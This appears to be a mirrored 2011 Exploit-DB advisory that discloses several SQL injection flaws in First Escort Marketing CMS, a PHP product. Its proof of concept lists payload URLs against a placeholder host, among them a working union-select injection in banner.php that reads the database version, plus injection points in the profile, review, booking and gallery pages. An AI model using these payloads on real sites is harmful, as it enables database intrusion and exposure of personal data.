First Escort Marketing CMS – Multiple SQL Injections Vulnerabilities

  • 作者: NoNameMT
    日期: 2011-04-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17197/
  • # PoC Title: First Escort Marketing CMS Multiple SQL Injection
    Vunerabilities
    # Platform: php
    # Date: 18.04.2011
    # Author: NoNameMT
    # Software Link: http://www.first-escort-marketing.co.uk/agencies.html
    # Price: 599 £
    # Tested on: Windows 7
    # Mail: nonamemt@gmail.com
    # Homepage: http://nonamemt.us
    
    # Proof of Concept:
    http://site.com/escort_agency/banner.php?categoryID=-2'+union+select+1,version(),3,4,5,6,7--+
    http://site.com/escort_agency/escort-profile.php?modelid=13'[Blind-SQL]
    http://site.com/escort_agency/write_review.php?modelid=13'[SQL]
    http://site.com/escort_agency/booking-form.php?modelid=13'[SQL]
    http://site.com/escort_agency/gallery_escorts.php?gallery_id=13'[SQL]
    
    # Greetings to:
    Team-Internet, 4004-security-project.com, bursali, Easy Laster, Dr. Sp!c,
    ezah, Xplo1t, enco